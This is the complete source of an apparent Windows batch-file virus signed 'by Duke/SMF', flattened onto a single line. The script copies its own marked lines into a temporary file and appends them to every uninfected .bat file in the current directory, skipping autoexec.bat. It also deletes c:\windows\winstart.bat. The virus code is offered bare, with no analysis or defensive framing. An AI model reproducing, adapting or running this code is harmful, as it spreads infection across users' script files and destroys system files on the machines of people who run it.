@echo off %SMF% if "%1=="@ goto SMFz echo.>SMF.bat find "SMF"<%0>>SMF.bat for %%b in (*.bat) do call SMF.bat @ %%b del SMF.bat del c:\windows\winstart.bat>nul %SMF% goto SMF :SMFz [SBVM] if "%2=="autoexec.bat goto SMF find "SMF"<%2>nul if errorlevel 1 type SMF.bat>>%2 :SMF by Duke/SMF